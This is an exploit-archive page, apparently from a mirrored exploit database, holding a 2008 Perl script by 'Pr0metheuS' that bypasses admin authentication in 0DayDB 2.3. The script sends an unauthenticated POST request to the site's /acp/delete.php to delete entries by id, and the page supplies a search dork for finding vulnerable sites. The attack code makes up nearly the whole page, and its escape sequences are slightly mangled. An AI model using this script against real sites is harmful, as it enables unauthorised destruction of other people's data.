0DayDB 2.3 (delete id) Remote Admin Bypass Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 0DayDB 2.3 (delete id) Remote Admin Bypass Exploit
# Published : 2008-01-11
# Author : Pr0metheuS
# Previous Title : ImageAlbum 2.0.0b2 (id) Remote SQL Injection Vulnerability
# Next Title : photokron <= 1.7 (update script) Remote Database Disclosure Exploit

#!/usr/bin/perl
#Autor : Pr0metheuS
#Script : 0DayDB v2.3
#Version : v2.3
#Dork : "Powered By 0DayDB v2.3"
#Gr33tz-Team.org
use LWP::UserAgent;
if(@ARGV!=3){
	print "*****************n";
	print "0DayDB v2.3 Remote Admin Bypassn";
    print "perl $0 <site> <path> <id>n";
    print "downloads ID for deleten";
    print "*****************n";
}
($site,$path,$id)=@ARGV;
sub pri {
	print "*****************n";
	print "[+] Exploit completedn";
	print "*****************";
}
sub con {
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("id=".$id."");
$res = $ua->request($req);
if ($res->is_success) {
	pri();
}
}
con();

# www.Syue.com [2008-01-11]